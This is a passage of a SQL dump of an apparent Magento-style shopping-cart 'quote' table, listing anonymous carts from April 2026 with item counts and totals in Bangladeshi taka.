(892, 0, '2026-04-04 13:55:57', '2026-04-04 13:55:57', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(893, 1, '2026-04-04 15:29:25', '2026-04-04 15:29:27', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 187.2000, 187.2000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 234.0000, 234.0000, 187.2000, 187.2000, 1, 0, NULL, NULL, 0),
(894, 1, '2026-04-04 16:05:38', '2026-04-04 16:06:02', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 256.8000, 256.8000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 321.0000, 321.0000, 256.8000, 256.8000, 1, 0, NULL, NULL, 0),
(895, 1, '2026-04-04 16:05:44', '2026-04-04 16:05:44', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(896, 1, '2026-04-04 16:05:45', '2026-04-04 16:05:45', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(897, 1, '2026-04-04 16:05:46', '2026-04-04 16:05:46', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(898, 1, '2026-04-04 16:05:47', '2026-04-04 16:05:47', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0);
INSERT INTO `quote` (`entity_id`, `store_id`, `created_at`, `updated_at`, `converted_at`, `is_active`, `is_virtual`, `is_multi_shipping`, `items_count`, `items_qty`, `orig_order_id`, `store_to_base_rate`, `store_to_quote_rate`, `base_currency_code`, `store_currency_code`, `quote_currency_code`, `grand_total`, `base_grand_total`, `checkout_method`, `customer_id`, `customer_tax_class_id`, `customer_group_id`, `customer_email`, `customer_prefix`, `customer_firstname`, `customer_middlename`, `customer_lastname`, `customer_suffix`, `customer_dob`, `customer_note`, `customer_note_notify`, `customer_is_guest`, `remote_ip`, `applied_rule_ids`, `reserved_order_id`, `password_hash`, `coupon_code`, `global_currency_code`, `base_to_global_rate`, `base_to_quote_rate`, `customer_taxvat`, `customer_gender`, `subtotal`, `base_subtotal`, `subtotal_with_discount`, `base_subtotal_with_discount`, `is_changed`, `trigger_recollect`, `ext_shipping_info`, `gift_message_id`, `is_persistent`) VALUES
(899, 1, '2026-04-04 16:05:49', '2026-04-04 16:05:49', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(900, 1, '2026-04-04 16:05:50', '2026-04-04 16:05:50', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(901, 1, '2026-04-04 16:05:51', '2026-04-04 16:05:51', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(902, 1, '2026-04-04 16:05:52', '2026-04-04 16:05:52', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(903, 1, '2026-04-04 16:05:53', '2026-04-04 16:05:53', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(904, 1, '2026-04-04 16:05:54', '2026-04-04 16:05:54', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(905, 1, '2026-04-04 16:05:55', '2026-04-04 16:05:55', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(906, 1, '2026-04-04 16:05:56', '2026-04-04 16:05:56', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(907, 1, '2026-04-04 16:06:06', '2026-04-04 16:06:07', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 256.8000, 256.8000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 321.0000, 321.0000, 256.8000, 256.8000, 1, 0, NULL, NULL, 0),
(908, 1, '2026-04-04 16:06:11', '2026-04-04 16:06:12', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 256.8000, 256.8000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 321.0000, 321.0000, 256.8000, 256.8000, 1, 0, NULL, NULL, 0),
(909, 1, '2026-04-04 16:06:15', '2026-04-04 16:06:16', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 256.8000, 256.8000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 321.0000, 321.0000, 256.8000, 256.8000, 1, 0, NULL, NULL, 0),
(910, 1, '2026-04-04 16:06:20', '2026-04-04 16:06:21', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 256.8000, 256.8000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 321.0000, 321.0000, 256.8000, 256.8000, 1, 0, NULL, NULL, 0),
(911, 1, '2026-04-04 16:06:25', '2026-04-04 16:06:26', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 256.8000, 256.8000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 321.0000, 321.0000, 256.8000, 256.8000, 1, 0, NULL, NULL, 0),
(912, 1, '2026-04-04 20:51:23', '2026-04-04 20:51:23', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(913, 1, '2026-04-04 21:28:21', '2026-04-04 21:28:23', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 187.2000, 187.2000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 234.0000, 234.0000, 187.2000, 187.2000, 1, 0, NULL, NULL, 0),
(914, 1, '2026-04-05 02:04:35', '2026-04-05 02:04:56', NULL, 1, 0, 0, 1, 12.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 4051.2000, 4051.2000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 5064.0000, 5064.0000, 4051.2000, 4051.2000, 1, 0, NULL, NULL, 0),
(915, 1, '2026-04-05 03:34:34', '2026-04-05 03:34:35', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 187.2000, 187.2000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 234.0000, 234.0000, 187.2000, 187.2000, 1, 0, NULL, NULL, 0),
(916, 1, '2026-04-05 04:20:21', '2026-04-05 04:20:21', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(917, 1, '2026-04-05 09:41:21', '2026-04-05 09:41:23', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 187.2000, 187.2000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 234.0000, 234.0000, 187.2000, 187.2000, 1, 0, NULL, NULL, 0),
(918, 1, '2026-04-05 11:41:14', '2026-04-05 11:41:14', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(919, 1, '2026-04-05 16:19:35', '2026-04-05 16:19:38', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 187.2000, 187.2000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 234.0000, 234.0000, 187.2000, 187.2000, 1, 0, NULL, NULL, 0),
(920, 1, '2026-04-05 19:08:52', '2026-04-05 19:08:52', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(921, 1, '2026-04-05 22:09:06', '2026-04-05 22:09:25', NULL, 1, 0, 0, 1, 6.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 2025.6000, 2025.6000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 2532.0000, 2532.0000, 2025.6000, 2025.6000, 1, 0, NULL, NULL, 0),
(922, 1, '2026-04-05 22:26:03', '2026-04-05 22:26:25', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 187.2000, 187.2000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 234.0000, 234.0000, 187.2000, 187.2000, 1, 0, NULL, NULL, 0),
(923, 1, '2026-04-06 01:10:13', '2026-04-06 01:10:13', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(924, 1, '2026-04-06 02:40:33', '2026-04-06 02:40:33', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(925, 1, '2026-04-06 04:23:56', '2026-04-06 04:23:58', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 187.2000, 187.2000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 234.0000, 234.0000, 187.2000, 187.2000, 1, 0, NULL, NULL, 0),
(926, 0, '2026-04-06 10:16:35', '2026-04-06 10:16:35', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(927, 1, '2026-04-06 10:39:11', '2026-04-06 10:39:13', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 187.2000, 187.2000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 234.0000, 234.0000, 187.2000, 187.2000, 1, 0, NULL, NULL, 0),
(928, 1, '2026-04-06 10:39:18', '2026-04-06 10:39:18', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(929, 1, '2026-04-06 14:09:30', '2026-04-06 14:09:30', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(930, 1, '2026-04-06 17:30:59', '2026-04-06 17:31:08', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 187.2000, 187.2000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 234.0000, 234.0000, 187.2000, 187.2000, 1, 0, NULL, NULL, 0),
(931, 1, '2026-04-06 20:10:27', '2026-04-06 20:10:27', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(932, 1, '2026-04-06 20:43:45', '2026-04-06 20:43:45', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(933, 1, '2026-04-07 00:12:33', '2026-04-07 00:12:36', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 187.2000, 187.2000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 234.0000, 234.0000, 187.2000, 187.2000, 1, 0, NULL, NULL, 0),
(934, 1, '2026-04-07 05:29:09', '2026-04-07 05:29:09', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(935, 1, '2026-04-07 06:43:24', '2026-04-07 06:43:27', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 187.2000, 187.2000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 234.0000, 234.0000, 187.2000, 187.2000, 1, 0, NULL, NULL, 0),
(936, 1, '2026-04-07 11:12:04', '2026-04-07 11:12:04', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(937, 1, '2026-04-07 13:33:26', '2026-04-07 13:33:32', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 187.2000, 187.2000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 234.0000, 234.0000, 187.2000, 187.2000, 1, 0, NULL, NULL, 0),
(938, 1, '2026-04-07 14:50:31', '2026-04-07 14:50:31', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(939, 1, '2026-04-07 20:19:49', '2026-04-07 20:19:52', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 187.2000, 187.2000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 234.0000, 234.0000, 187.2000, 187.2000, 1, 0, NULL, NULL, 0),
(940, 1, '2026-04-08 00:13:16', '2026-04-08 00:13:16', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(941, 1, '2026-04-08 02:58:10', '2026-04-08 02:59:30', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 187.2000, 187.2000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 234.0000, 234.0000, 187.2000, 187.2000, 1, 0, NULL, NULL, 0),
(942, 1, '2026-04-08 08:38:38', '2026-04-08 08:38:38', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(943, 1, '2026-04-08 09:25:13', '2026-04-08 09:25:13', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(944, 1, '2026-04-08 09:51:21', '2026-04-08 09:51:34', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 187.2000, 187.2000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 234.0000, 234.0000, 187.2000, 187.2000, 1, 0, NULL, NULL, 0),
(945, 1, '2026-04-08 11:36:23', '2026-04-08 11:36:23', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(946, 1, '2026-04-08 16:57:49', '2026-04-08 16:57:55', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 187.2000, 187.2000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 234.0000, 234.0000, 187.2000, 187.2000, 1, 0, NULL, NULL, 0),
(947, 1, '2026-04-08 17:12:06', '2026-04-08 17:12:23', NULL, 1, 0, 0, 1, 6.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 2025.6000, 2025.6000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 2532.0000, 2532.0000, 2025.6000, 2025.6000, 1, 0, NULL, NULL, 0),
(948, 1, '2026-04-08 18:41:59', '2026-04-08 18:41:59', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(949, 1, '2026-04-08 23:43:51', '2026-04-08 23:43:53', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 187.2000, 187.2000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 234.0000, 234.0000, 187.2000, 187.2000, 1, 0, NULL, NULL, 0),
(950, 1, '2026-04-09 03:43:23', '2026-04-09 03:43:23', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
